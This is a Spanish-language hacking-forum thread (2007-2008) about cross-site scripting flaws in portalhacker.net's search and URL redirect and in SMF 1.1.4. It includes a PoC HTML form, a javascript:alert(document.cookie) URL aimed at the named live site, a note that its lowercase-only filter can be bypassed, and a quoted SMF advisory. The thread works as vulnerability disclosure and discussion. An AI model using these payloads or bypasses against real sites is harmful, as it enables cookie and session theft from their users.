XSS en PortalHacker.net

Foro de elhacker.net

Seguridad Informática

Hacking

Bugs y Exploits

Nivel Web (Moderadores: sirdarckcat, WHK)

XSS en PortalHacker.net

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1] 2

Autor

Tema: XSS en PortalHacker.net (Leído 9,085 veces)

WHK

Moderador Global

Desconectado

Mensajes: 6.606

Sin conocimiento no hay espíritu

XSS en PortalHacker.net

« en: 2 Noviembre 2007, 00:54 am »

Hace tiempo encontré algunos XSS en elhacker.com y .org pero aún no los reparan a pesar del tiempo que llevan y de que fueron publicados y avisados. Ahora portalhacker.net también tiene un XSS localizado en el buscador de la pagina principal.

PoC:

Código

<form name="buscarform" action="http://www.portalhacker.net/buscar.php" method="post">
<input name="buscar" type="hidden" value="ok">
<input name="query" type="text" size=12 value="Pon tu XSS acá">
<input type="submit" value="Enviar"></form>

Donde puse "Pon tu XSS acá" prueba con enviar la siguiente petición post: "<script>alert(/xss/);</script>"

Después se quejan del porqué les roban las cookies.


« Última modificación: 2 Noviembre 2007, 01:02 am por WHK »	En línea

- https://yhojann.cl/ - https://whk.cl/

Freeze.

Desconectado

Mensajes: 2.732

Re: XSS en PortalHacker.net

« Respuesta #1 en: 2 Noviembre 2007, 01:04 am »

Si no me equivoco (Y creo que no) es un Bug en los Smf 1.1.4


	En línea

http://pssimo.wordpress.com

WHK

Moderador Global

Desconectado

Mensajes: 6.606

Sin conocimiento no hay espíritu

Re: XSS en PortalHacker.net

« Respuesta #2 en: 2 Noviembre 2007, 01:05 am »

NO..... ese buscador no es propio del foro, el XSS de SMF es otro mas

al final tienen como 4 XSS incluyendo web y foro pero la diferencia es que los que tu dices son solo locales y tendrías que tener derechos sobre el foro para crear los XSS, este que yo digo cualquiera puede crearlo.


« Última modificación: 2 Noviembre 2007, 01:09 am por WHK »	En línea

- https://yhojann.cl/ - https://whk.cl/

Freeze.

Desconectado

Mensajes: 2.732

Re: XSS en PortalHacker.net

« Respuesta #3 en: 2 Noviembre 2007, 01:07 am »

Umm ok..!

Ahora si te doy la razon. xD xD xD
"Despues se quejan"

Por cierto no sabes de donde bajo el parche para el XSS q presenta el 1.1.4...!!


	En línea

http://pssimo.wordpress.com

WHK

Moderador Global

Desconectado

Mensajes: 6.606

Sin conocimiento no hay espíritu

Re: XSS en PortalHacker.net

« Respuesta #4 en: 2 Noviembre 2007, 01:10 am »

Citar

Por cierto no sabes de donde bajo el parche para el XSS q presenta el 1.1.4...!!

No hay aún pero no te preocupes ya que no son remotos a menos que se incluya un CSRF aunque dudo mucho que SMF sea vulnerable a eso.

Supongo que te refieres a este:

Citar

_____________________________________________________________________
_______
| |
| __________.__ __ __________ __ |
| \______ \ | _____ ____ | | _\______ \ ____ _____/ |_ ______ |
| | | _/ | \__ \ _/ ___\| |/ /| _// _ \ / _ \ __\/ ___/ |
| | | \ |__/ __ \\ \___| < | | ( <_> | <_> ) | \___ \ |
| |______ /____(____ /\___ >__|_ \|____|_ /\____/ \____/|__| /____ > |
| \/ \/ \/ \/ \/ \/ |
|----------------------------------------------------------------------------|
| |
| http://www.blackroots.it staff[at]blackroots[
dot]it |
| |
| Autore : The-Dark_Man && Bled |
|____________________________________________________________________________|

##############################################################################
# #
# XSS smf 1.1.4 #
# #
##############################################################################

Found Xss in the administration...

1----------------------
Go to http://link/[path]/index.php?action=news
Modify the news and insert
<script>alert('Xss')</script>
Save the news! no an alert will be generated in every page!

2---------------------
Go to http://link/[path]/index.php?action=manageboards
Create a new forum with Title:
<script>alert('Xss')</script>
result? XSS

3---------------------
Go here http://link/[path]/index.php?action=membergroups;
Modify or create a new gruop and name it:
<script>alert('Xss')</script>

----------------------
The-Dark_Man && Bled of blackroots.it


« Última modificación: 2 Noviembre 2007, 01:12 am por WHK »	En línea

- https://yhojann.cl/ - https://whk.cl/

WHK

Moderador Global

Desconectado

Mensajes: 6.606

Sin conocimiento no hay espíritu

Re: XSS en PortalHacker.net

« Respuesta #5 en: 13 Enero 2008, 03:24 am »

Nuevamente portalhacker tiene un nuevo xss:
http://foro.portalhacker.net/url.php?urlc=javascript:alert(document.cookie);

Parece que ese foro se ha descuidado muchisimo, ojala que no le pase lo mismo que a otro que le robaron el dominio por un xss.

Deja mucho de que hablar en cuanto a la calidad del servidor y del estado de la misma página.

¿Será mala administración?


	En línea

- https://yhojann.cl/ - https://whk.cl/

Freeze.

Desconectado

Mensajes: 2.732

Re: XSS en PortalHacker.net

« Respuesta #6 en: 13 Enero 2008, 03:32 am »

Es increible que un foro de 'hacking' descuide tanto su web/foro


	En línea

http://pssimo.wordpress.com

NadiceJMA

Desconectado

Mensajes: 185

Nca

Re: XSS en PortalHacker.net

« Respuesta #7 en: 13 Enero 2008, 04:02 am »

parece que ya repararon el bug....


	En línea

Thor

Desconectado

Mensajes: 1.177

Re: XSS en PortalHacker.net

« Respuesta #8 en: 13 Enero 2008, 04:14 am »

No lo han reparado del todo, la página busca la palabra "javascript" pero... solo en minúsculas, esto sigue funcionando:
http://foro.portalhacker.net/url.php?urlc=javascript:alert(document.cookie);


	En línea

sirdarckcat

Aspirante a supervillano
Moderador

Desconectado

Mensajes: 7.029

No estoy loco, soy mentalmente divergente

Re: XSS en PortalHacker.net

« Respuesta #9 en: 13 Enero 2008, 17:24 pm »

WHK.. la fuente.. ¬¬


	En línea

Leer reglas

- WarZone.elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net

Páginas: [1] 2

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Que pasó con PortalHacker.net ? Foro Libre	misionero2018	5	5,472	28 Febrero 2019, 10:12 am por MHFRAN